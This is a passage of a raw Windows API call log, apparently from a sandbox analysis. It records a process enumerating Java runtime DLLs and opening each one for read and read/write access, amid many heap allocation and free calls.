hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.461] AreFileApisANSI () returned 1 [0093.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0093.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 54 [0093.461] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9040)) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0093.461] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.461] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.461] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9fa40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mlib_image.dll", cAlternateFileName="MLIB_I~1.DLL")) returned 1 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0093.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0093.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.462] AreFileApisANSI () returned 1 [0093.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll", lpUsedDefaultChar=0x0) returned 54 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0093.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.462] AreFileApisANSI () returned 1 [0093.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76200 [0093.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 54 [0093.463] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.464] GetFileType (hFile=0x360) returned 0x1 [0093.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0093.464] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.464] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.464] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.464] CloseHandle (hObject=0x360) returned 1 [0093.464] AreFileApisANSI () returned 1 [0093.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75be8 [0093.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 54 [0093.465] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.465] GetFileType (hFile=0x360) returned 0x1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0093.465] CloseHandle (hObject=0x360) returned 1 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.466] AreFileApisANSI () returned 1 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75d50 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 54 [0093.466] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9fa40)) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0093.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.466] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa12a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0093.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.467] AreFileApisANSI () returned 1 [0093.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll", lpUsedDefaultChar=0x0) returned 52 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0093.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.467] AreFileApisANSI () returned 1 [0093.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0093.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 52 [0093.468] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.468] GetFileType (hFile=0x360) returned 0x1 [0093.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0093.468] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.468] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.468] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.468] CloseHandle (hObject=0x360) returned 1 [0093.468] AreFileApisANSI () returned 1 [0093.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0093.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll") returned 52 [0093.469] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.469] GetFileType (hFile=0x360) returned 0x1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0093.469] CloseHandle (hObject=0x360) returned 1 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: 